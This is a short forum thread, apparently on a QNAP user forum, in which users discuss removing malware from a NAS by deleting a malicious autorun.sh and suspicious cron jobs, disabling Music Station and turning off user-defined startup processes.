somy1982 wrote: Do you have music station installed and enabled?
benzo83 wrote: not too cheap 300euro :/
dolbyman wrote: 8TB external drives are cheap..should be plenty of space for movies
QNAP support suspects it is caused by a vulnerability in Music Station and suggested turning it off for now.
Thanks, have done that and removed the autorun.sh. Deleted everything I could find and also removed all suspicious cron jobs. The NAS is restarted and the jobs seem to be removed permanently.
Mousetick wrote: Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.
This doesn't "clean" or remove anything; it just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late: it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.